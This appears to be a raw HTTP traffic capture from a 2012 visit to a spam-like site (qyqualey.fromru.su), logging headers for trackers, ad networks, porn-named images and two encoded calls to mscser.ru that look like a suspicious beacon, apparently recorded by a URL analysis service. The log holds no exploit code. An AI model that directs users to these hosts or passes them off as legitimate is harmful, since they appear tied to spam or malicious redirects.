GET /hit;start-qip-ru?q;r;s117688524;uhttp%3A//qyqualey.fromru.su/;0.8521948213958476 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/ Cookie: FTID=1GcP3Z3NLwn2	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:19 GMT Server: 0W/0.8c Connection: Close Content-Length: 43 Expires: Mon, 07 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: VID=3MAuEA04x5n2; path=/; expires=Wed, 06 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /hit;pochta-ru?q;t26.1;r;s117688524;uhttp%3A//qyqualey.fromru.su/;0.8947012742051451 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/ Cookie: FTID=1GcP3Z3NLwn2	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:19 GMT Server: 0W/0.8c Connection: Close Content-Length: 149 Expires: Mon, 07 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: VID=3MAuEA04x5n2; path=/; expires=Wed, 06 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /V13b**R%3Erbc_ru/ru/UTF-8/tmsec=pochta_hostings/428444059 HTTP/1.1 Host: www.tns-counter.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/ Cookie: guid=45420C03509990E3X1352241379	HTTP/1.1 200 OK Content-Type: image/gif Server: tns-counter.0.5.3 Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 43 Connection: close Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Expires: Thu, 01 Jan 1970 00:00:01 GMT Pragma: no-cache
GET /code?pid=3001&gid=329&oin=0&rid=61826&dreferer= HTTP/1.1 Host: engine.mediamir.medialand.ru GET /code?pid=3001&gid=329&oin=0&rid=61826&dreferer= HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 301 Moved HTTP/1.1 301 Moved Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Connection: keep-alive Keep-Alive: timeout=20 X-Server: macina/0.2.15 - macina-vint Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: max-age=0, no-cache, no-cache=Set-Cookie, no-store, must-revalidate, proxy-revalidate Pragma: no-cache Content-Length: 0 P3P: policyref="http://content.relax.ru/w3c/adnet.p3p", CP="NOI DSP COR LAW CURa ADMa DEVa OUR NOR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC" Location: http://engine.mediamir.medialand.ru/test?extip=80.203.168.254&exip=80.203.168.254&pid=3001&gid=329&oin=0&rid=61826&dreferer= Set-Cookie: ctc=on%5F3; Expires=Thu, 31-Dec-2020 23:59:59 GMT; Domain=medialand.ru; Path=/ id=250780777; Expires=Thu, 31-Dec-2020 23:59:59 GMT; Domain=medialand.ru; Path=/
GET /p/a/papa.pochta.ru.12654.js?t=11210 HTTP/1.1 Host: jsn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: application/x-javascript Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:19 GMT Last-Modified: Thu, 27 Sep 2012 15:32:19 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20 Expires: Wed, 07 Nov 2012 22:36:19 GMT Cache-Control: max-age=86400 Content-Encoding: gzip
GET /test?extip=80.203.168.254&exip=80.203.168.254&pid=3001&gid=329&oin=0&rid=61826&dreferer= HTTP/1.1 Host: engine.mediamir.medialand.ru GET /test?extip=80.203.168.254&exip=80.203.168.254&pid=3001&gid=329&oin=0&rid=61826&dreferer= HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/ Cookie: ctc=on%5F3; id=250780777	HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Connection: keep-alive Keep-Alive: timeout=20 X-Server: macina/0.2.15 - macina-kumar Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Length: 4073 P3P: policyref="http://content.relax.ru/w3c/adnet.p3p", CP="NOI DSP COR LAW CURa ADMa DEVa OUR NOR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC" Set-Cookie: ctc=on%5F3; Expires=Thu, 31-Dec-2020 23:59:59 GMT; Domain=medialand.ru; Path=/ id=250780777; Expires=Thu, 31-Dec-2020 23:59:59 GMT; Domain=medialand.ru; Path=/ fci=652097-618-1-1352241379-1; Expires=Thu, 31-Dec-2020 23:59:59 GMT; Domain=engine.mediamir.medialand.ru; Path=/ plcnt=3001-1-1352327779; Expires=Thu, 31-Dec-2020 23:59:59 GMT; Domain=engine.mediamir.medialand.ru; Path=/
GET /hit;Mgidohvat/ni?rhttp%3A//qyqualey.fromru.su/;s117688524;uhttp%3A//r.qip.ru/iframe%3Fname%3DHosting_subfooter%26jscookie%3D0;0.43818001611140434 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0 Cookie: FTID=1GcP3Z3NLwn2; VID=3MAuEA04x5n2	HTTP/1.1 302 Moved Temporarily Content-Type: text/html Date: Tue, 06 Nov 2012 22:36:20 GMT Server: 0W/0.8c Location: http://counter.yadro.ru/hit;Mgidohvat/ni?q;rhttp%3A//qyqualey.fromru.su/;s117688524;uhttp%3A//r.qip.ru/iframe%3Fname%3DHosting_subfooter%26jscookie%3D0;0.43818001611140434 Content-Length: 32 Expires: Mon, 07 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: FTID=0; path=/; expires=Sat, 01 Jan 2000 00:00:00 GMT; domain=.yadro.ru
GET /images/mui.gif?11210223 HTTP/1.1 Host: counter.marketgid.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 301 Moved Permanently Content-Type: text/html Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 184 Connection: keep-alive Keep-Alive: timeout=20 Location: http://mg.yadro.ru/id.gif?muid=ca7kipzHseA1 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: muidn=ca7kipzHseA1;Domain=.dt00.net;Path=/;Max-Age=795230620; muidn=ca7kipzHseA1;Domain=.marketgid.com;Path=/;Max-Age=795230620;
GET /hit;Mgidohvat/ni?q;rhttp%3A//qyqualey.fromru.su/;s117688524;uhttp%3A//r.qip.ru/iframe%3Fname%3DHosting_subfooter%26jscookie%3D0;0.43818001611140434 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0 Cookie: VID=3MAuEA04x5n2	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:20 GMT Server: 0W/0.8c Connection: Close Content-Length: 43 Expires: Mon, 07 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache
GET /img/b4eeec5f/ebe50897/18d3859c/83b8e514.jpg HTTP/1.1 Host: rbqip.pochta.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/rb?name=Hosting_240x400&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 15639 Last-Modified: Tue, 28 Feb 2012 11:25:03 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /id.gif?muid=ca7kipzHseA1 HTTP/1.1 Host: mg.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0 Cookie: VID=3MAuEA04x5n2	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:27:14 GMT Server: 0W/0.8d Connection: Close Content-Length: 35 Last-Modified: Sun, 09 Sep 2001 01:46:40 GMT Expires: Wed, 07 Nov 2012 02:27:14 GMT
GET /1940/1940345_m.jpg HTTP/1.1 Host: imgn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 2872 Last-Modified: Tue, 23 Oct 2012 10:31:04 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Thu, 06 Dec 2012 22:36:20 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
GET /1955/1955825_m.jpg HTTP/1.1 Host: imgn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 3500 Last-Modified: Wed, 31 Oct 2012 08:10:23 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Thu, 06 Dec 2012 22:36:20 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
GET /1947/1947095_m.jpg HTTP/1.1 Host: imgn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 2622 Last-Modified: Fri, 26 Oct 2012 09:19:04 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Thu, 06 Dec 2012 22:36:20 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
GET /1420/1420799_m.jpg HTTP/1.1 Host: imgn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 3854 Last-Modified: Fri, 12 Oct 2012 07:26:29 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Thu, 06 Dec 2012 22:36:20 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
GET /1250/1250166_m.jpg HTTP/1.1 Host: imgn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 3773 Last-Modified: Tue, 19 Jul 2011 08:19:20 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Thu, 06 Dec 2012 22:36:20 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
GET /1941/1941792_m.jpg HTTP/1.1 Host: imgn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 2687 Last-Modified: Wed, 24 Oct 2012 05:01:24 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Thu, 06 Dec 2012 22:36:20 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
GET /t/base.js HTTP/1.1 Host: content.relax.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: application/x-javascript Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 20408 Last-Modified: Tue, 06 Nov 2012 08:54:42 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /t/inline_pushup.js?20121061 HTTP/1.1 Host: content.relax.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: application/x-javascript Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 5394 Last-Modified: Tue, 25 Sep 2012 15:39:37 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /t/inline_pushup_right_bottom.js?20121061 HTTP/1.1 Host: content.relax.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: application/x-javascript Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 4745 Last-Modified: Thu, 27 Sep 2012 13:34:49 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /652097/memori_02.jpg HTTP/1.1 Host: content.relax.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 34488 Last-Modified: Mon, 24 Sep 2012 08:55:54 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /storage/ HTTP/1.1 Host: content.medialand.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/ Cookie: ctc=on%5F3; id=250780777	HTTP/1.1 200 OK Content-Type: text/html; charset=windows-1251 Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 1679 Last-Modified: Tue, 14 Aug 2012 14:00:57 GMT Connection: keep-alive Accept-Ranges: bytes
GET /storage/storage.js HTTP/1.1 Host: content.medialand.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://content.medialand.ru/storage/ Cookie: ctc=on%5F3; id=250780777	HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=windows-1251 Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 6105 Last-Modified: Tue, 14 Aug 2012 13:27:48 GMT Connection: keep-alive Accept-Ranges: bytes
GET /swfobject/2.2/swfobject.min.js HTTP/1.1 Host: yandex.st User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://content.medialand.ru/storage/	HTTP/1.1 200 OK Content-Type: application/x-javascript Access-Control-Allow-Origin: * Vary: Accept-Encoding Content-Encoding: gzip Last-Modified: Wed, 21 Oct 2009 13:16:03 GMT Etag: "1632719802" Expires: Thu, 15 Sep 2022 22:36:20 GMT Cache-Control: max-age=311040000 Accept-Ranges: bytes Content-Length: 3944 Date: Tue, 06 Nov 2012 22:36:20 GMT Server: lighttpd/1.4.26
GET /close_3.png HTTP/1.1 Host: content.relax.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/png Server: nginx Date: Tue, 06 Nov 2012 22:36:21 GMT Content-Length: 424 Last-Modified: Thu, 20 Sep 2012 16:48:48 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /favicon.ico HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: __utma=1.59269207.1352241379.1352241379.1352241379.1; __utmb=1.1.10.1352241379; __utmc=1; __utmz=1.1352241379.1.1.utmcsr=(direct)\|utmccn=(direct)\|utmcmd=(none)	HTTP/1.1 404 Not Found Content-Type: image/gif Server: nginx Date: Tue, 06 Nov 2012 22:36:21 GMT Content-Length: 43 Connection: keep-alive
GET /favicon.ico HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: __utma=1.59269207.1352241379.1352241379.1352241379.1; __utmb=1.1.10.1352241379; __utmc=1; __utmz=1.1352241379.1.1.utmcsr=(direct)\|utmccn=(direct)\|utmcmd=(none)	HTTP/1.1 404 Not Found Content-Type: image/gif Server: nginx Date: Tue, 06 Nov 2012 22:36:22 GMT Content-Length: 43 Connection: keep-alive
GET /in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQwMBAEABA== HTTP/1.1 Host: mscser.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/
GET /in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQwMBAEABA== HTTP/1.1 Host: mscser.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/

Request	Response
GET / HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html; charset=windows-1251 Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip
GET /sbornik-porno-kanalov-smotret-onlayn.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Content-Length: 4297 Last-Modified: Mon, 29 Nov 2010 06:19:33 GMT Connection: keep-alive Accept-Ranges: bytes
GET /menu.js HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=windows-1251 Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Content-Length: 738 Last-Modified: Mon, 29 Nov 2010 06:18:00 GMT Connection: keep-alive Accept-Ranges: bytes
GET /style.css HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: text/css Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Last-Modified: Mon, 29 Nov 2010 06:19:49 GMT Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip
GET /busplatnie-porno-igri.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Content-Length: 5020 Last-Modified: Mon, 29 Nov 2010 06:17:39 GMT Connection: keep-alive Accept-Ranges: bytes
